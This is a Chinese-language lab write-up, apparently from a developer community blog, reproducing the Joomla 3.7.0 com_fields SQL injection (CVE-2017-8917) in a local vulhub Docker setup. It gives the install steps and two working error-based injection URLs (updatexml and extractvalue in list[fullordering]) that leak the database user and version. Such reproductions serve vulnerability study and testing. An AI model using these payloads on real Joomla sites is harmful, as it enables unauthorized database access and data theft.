AI 助理
备案控制台
开发者社区 数据库 文章 正文

Joomla 3.7.0 SQL注入漏洞 CVE-2017-8917

2022-12-02 1120
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: Joomla 3.7.0 SQL注入漏洞 CVE-2017-8917

漏洞简介

com_fields组件出现漏洞,com_fields组件是在3.7版本添加的,如果你使用此版本,将受到影响,并应尽快更新。这个组件可以公开访问,意味着任何能访问你站点的用户都可以发起攻击

漏洞复现

(root💀guiltyfet)-[/home/guiltyfet/vulhub/joomla]
└─# cd CVE-2017-8917
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/joomla/CVE-2017-8917]
└─# docker-compose up -d
Creating network "cve-2017-8917_default" with the default driver

来到安装页面,首先替换为中文

http://127.0.0.1:8080/

数据库地址:mysql:3306

用户:root

密码:root

数据库名:joomla

填入上述信息,正常安装即可

数据库地址注意要不出现不能连接到数据库。返回信息: Could not connect to MySQL.

安装

删除 “installation” 目录

http://127.0.0.1:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

对版本注入

http://127.0.0.1:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))

文章标签:
SQL
关系型数据库
数据安全/隐私保护
MySQL
安全
数据库
关键词:
SQL漏洞
SQL注入
SQL注入漏洞
joomla SQL漏洞
joomla SQL注入漏洞cve-2017-8917
5q2a2sugf4ej6
目录
相关文章
sysin
|
3月前
|
SQL Web App开发 安全
SQL Server 2025 年 8 月更新 - 修复 CVE-2025-49759 SQL Server 特权提升漏洞
SQL Server 2025 年 8 月更新 - 修复 CVE-2025-49759 SQL Server 特权提升漏洞
sysin
323 2
SQL Server 2025 年 8 月更新 - 修复 CVE-2025-49759 SQL Server 特权提升漏洞
sysin
|
2月前
|
SQL Web App开发 安全
SQL Server 2025 年 9 月更新 - 修复 CVE-2025-47997 SQL Server 信息泄露漏洞
SQL Server 2025 年 9 月更新 - 修复 CVE-2025-47997 SQL Server 信息泄露漏洞
sysin
149 0
SQL Server 2025 年 9 月更新 - 修复 CVE-2025-47997 SQL Server 信息泄露漏洞
sysin
|
4月前
|
SQL Web App开发 安全
SQL Server 2025年7月更新 - 修复 CVE-2025-49718 Microsoft SQL Server 信息泄露漏洞
SQL Server 2025年7月更新 - 修复 CVE-2025-49718 Microsoft SQL Server 信息泄露漏洞
sysin
377 0
SQL Server 2025年7月更新 - 修复 CVE-2025-49718 Microsoft SQL Server 信息泄露漏洞
sunyalei
|
10月前
|
SQL 安全 数据库
如何在Django中正确使用参数化查询或ORM来避免SQL注入漏洞?
如何在Django中正确使用参数化查询或ORM来避免SQL注入漏洞?
sunyalei
643 77
sunyalei
|
10月前
|
SQL 安全 数据库连接
除了使用Django的ORM,还能通过什么方式在Django中避免SQL注入漏洞?
除了使用Django的ORM,还能通过什么方式在Django中避免SQL注入漏洞?
sunyalei
277 73
蓝易云
|
8月前
|
SQL 安全 PHP
thinkphp5之sql注入漏洞-builder处漏洞
在Web应用开发中,SQL注入是一种需要高度警惕的安全漏洞。通过深入理解ThinkPHP5中的SQL查询机制,并结合安全编码实践,开发者可以有效防止SQL注入攻击,保障应用的安全性和稳定性。
蓝易云
391 13
蓝易云
|
SQL 安全 前端开发
Web学习_SQL注入_联合查询注入
联合查询注入是一种强大的SQL注入攻击方式,攻击者可以通过 `UNION`语句合并多个查询的结果,从而获取敏感信息。防御SQL注入需要多层次的措施,包括使用预处理语句和参数化查询、输入验证和过滤、最小权限原则、隐藏错误信息以及使用Web应用防火墙。通过这些措施,可以有效地提高Web应用程序的安全性,防止SQL注入攻击。
蓝易云
441 2
技术小牛人
|
SQL 存储 安全
SQL注入详解-6
技术小牛人
1446 0
技术小牛人
|
SQL 数据库 .NET
SQL注入详解-3
技术小牛人
877 0
技术小牛人
|
SQL 程序员 安全
SQL注入详解-2
技术小牛人
979 0

热门文章

最新文章

  • 1
    PHP中该怎样防止SQL注入?
  • 2
    SQL Server 2008性能故障排查(三)——I/O
  • 3
    网站安全检测 发现泛微OA致命的SQL注入漏洞
  • 4
    SQL Server 阻止了对组件 'Ad Hoc Distributed Queries' 的 STATEMENT'OpenRowset/OpenDatasource' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。
  • 5
    SQL行列转换实战
  • 6
    Sql Server substring(expression, start, length)函数
  • 7
    SQL 42501: Postgresql查询中的权限不足错误
  • 8
    SQL Server扩展事件(Extended Events)-- 体系结构
  • 9
    SQL Server 2008的cross apply 和 outer apply
  • 10
    在SQL 2005中用T-SQL插入中文数据时出现的问号或乱码的解决方案[转]
  • 1
    Web LLM 实验:利用 LLM API 实现 SQL 注入
    361
  • 2
    SQL 注入神器:SQLMap 简单使用
    375
  • 3
    奇思妙想的SQL|兼顾性能的数据倾斜处理新姿势
    460
  • 4
    如何巧用索引优化SQL语句性能?
    269
  • 5
    SQL INNER JOIN 关键字
    96
  • 6
    SQL 连接(JOIN)
    154
  • 7
    SQL DB - 关系型数据库是如何工作的
    127
  • 8
    利用SparkSQL Logical Plan Parse 打造大数据平台SQL诊断利器
    281
  • 9
    SQL BETWEEN 操作符
    131
  • 10
    SQL IN 操作符
    86

    • 相关课程

    更多
  • 如何在 PolarDB-X 中优化慢 SQL
  • SQL完全自学手册
  • SQL Server on Linux入门教程
  • SQL入门与实践
  • 数据库及SQL/MySQL基础
  • SQL进阶及查询

    • 相关电子书

    更多
  • SQL Server在电子商务中的应用与实践
  • GeoMesa on Spark SQL
  • 原生SQL on Hadoop引擎- Apache HAWQ 2.x最新技术解密malili
    • 下一篇
    阿里云负载均衡收费标准:ALB、NLB和CLB价格,包括LCU费用、实例费和公网带宽价格